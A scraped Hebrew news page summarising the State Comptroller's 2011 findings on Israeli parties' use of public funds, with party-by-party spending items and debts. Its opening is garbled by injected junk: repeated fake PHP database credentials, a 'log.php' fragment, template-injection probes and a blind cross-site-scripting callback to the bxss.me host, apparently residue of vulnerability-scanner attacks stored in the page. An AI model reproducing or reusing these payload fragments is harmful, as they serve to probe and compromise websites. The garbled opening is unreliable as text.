$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> דוח מבקר המדינה לשנת 2011 חושף את הבזבוזים של המפלגות
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

הוצאות ובזבוזים של המפלגות מכספי הציבור

תאריך: 22/10/2012 17:03   מחבר: מערכת האתר

מדוח מבקר המדינה לשנת 2011 הציבור למד שהמפלגות יודעות היטב לנצל את הכסף הציבורי שניתן להם על ידי המדינה לצורך פעילותן אל מול ציבור האזרחים. ממצאי דוח הביקורת מעלים כי המפלגות מממנות מכספי ציבור ארוחות לחברי הסיעה, נסיעות לחו"ל של חברי מפלגה, רכישת מתנות, מתנות לחתונות, תמיכה בסטודנטים בירדן, שכירת יחסי ציבור בחו"ל, העסקת ח"כים לשעבר ויועצים אסטרטגיים ועוד,

להלן עיקרי הממצאים לפי חלוקה למפלגות:

ליכוד

סיעת הליכוד מימנה אשתקד ארוחה בבית יו"ר התנועה ראש הממשלה בנימין נתניהו בעלות של 50,212 שקל, שבה השתתפו 120 מוזמנים. העלות לכל משתתף כ-418 שקל.

הליכוד כלל בחשבונותיו הוצאות של 8,600 שקל עבור מתנות לאירועים פרטיים שאינם אירועים של הסיעה.

הליכוד התקשר לקבלת שירותי ייעוץ אסטרטגי ותקשורתי עם 2 יועצים בעלות של כוללת של 32 אלף שקל בחודש.

מפלגת העבודה

הסיעה לא כללה בדו"ח את כל הוצאותיה בגין הבחירות המקדימות ליו"ר המפלגה אלא רשמה חלק מההוצאות כהוצאות שוטפות ואת היתרה כהוצאות נדחות לתקופה של 4 שנים.

מד"ע

המפלגה  כללה בחשבונותיה הוצאות בגין מתנות לחתונות בסך של 15,800 שקל.

ישראל ביתנו

סיעת "ישראל ביתנו" מימנה לנציגיה ביקור גומלין וחתימה על הסכם שיתוף פעולה עם מפלגות הליגה הצפונית של איטליה בעלות של 19 אלף שקל.

התקווה

סיעת התקווה, בראשות ח"כ אריה אלדד (האיחוד הלאומי), הוציאה 10 אלף דולר עבור פעילות יחסי ציבור בחו"ל וכן 100 אלף שקל עבור הדפסה ומשלוח של כ-7,300 חוברות לחו"ל.

תע"ל

סיעת תע"ל הוציאה כ-11 אלף שקל עבור נסיעות לחו"ל של בעלי תפקידים בה. בחשבונות הסיעה נכללו הוצאות בגין נסיעות למדינות שונות ואגרות מעבר לירדן.

המפד"ל

המפלגה לא רשמה במערכת החשבונות את מלוא הוצאותיה ולפיכך, מערכת חשבונותיה לא שיקפה את כל פעולותיה הכספיות. הסיעה כללה בחשבונותיה הוצאות נוספות בגין הבחירות המוניציפליות שנערכו בנובמבר 2008 בסך של 400,548 שקל וכן בגין הבחירות לכנסת ה-18 בסך של 457,218 שקל.

בל"ד

המפלגה רשמה פעולות כספיות שמקורן במערכת הבחירות ולא ניתן היה לקבוע בדרכי ביקורת מקובלות כי הרישומים בגינן היו שלמים ומהימנים. הסיעה מחקה יתרת זכאים שמקורן במערכות בחירות בסך של 453 אלף שקל בנימוק של "שינוי שיטה חשבונאית" ללא תיעוד תומך ואסמכתאות. הסיעה לא סגרה את חשבונות הבנקים ששימשו אותה במערכות הבחירות לרשויות המקומיות ולכנסת.

קדימה

היו"ר הנבחר, ח"כ שאול מופז, לא ניהל את חשבונותיו בהתאם להוראות החוק ולהנחיות מבקר המדינה, למרות שעשה זאת בתום לב או בהיעדר ניסיון. המבקר קנס אותו בקנס של 28 אלף שקל שאותו יצטרך להעביר לקופת המדינה.

חובות המפלגות

למרות החובות הרובצים על המפלגות יש להן כסף להוציא על מטרות שלא בדיוק מסתדרות עם הצרכים של הציבור. וזוהי רשימת החובות כפי שמצא מבקר המדינה בדוח שלו:

חובותיה של מפלגת העבודה, נכון ל-31 בדצמבר 2011, הגיעו ל-42 מיליון שקל, לעומת 53.3 מיליון שקל שנה קודם לכן;

חובות קדימה בסוף 2011 הגיעו ל-31 מיליון שקל, לעומת 34 מיליון שקל שנה קודם לכן;

חובות המפד"ל הגיעו בסוף 2011 ל-17.4 מיליון שקל לעומת 32.2 מיליון שקל בסוף 2010;

הליכוד הורידה את גובה החוב מ-28.8 מיליון שקל בסוף 2010 ל-13.3 מיליון שקל בסוף 2011;

מרצ הגיעה בסוף 2011 לחוב של 7.8 מיליון שקל (לעומת 9.8 מיליון שקל בסוף 2010.

לעומתן, 6 מפלגות היו ביתרות זכות בסוף 2011: בקופתה של ש"ס נמצאו באותה העת 5 מיליון שקל, ישראל ביתנו - 2.4 מיליון שקל, עצמאות - 1.089 מיליון שקל, דגל התורה - 1.1 מיליון שקל ותע"ל - 0.89 מיליון שקל.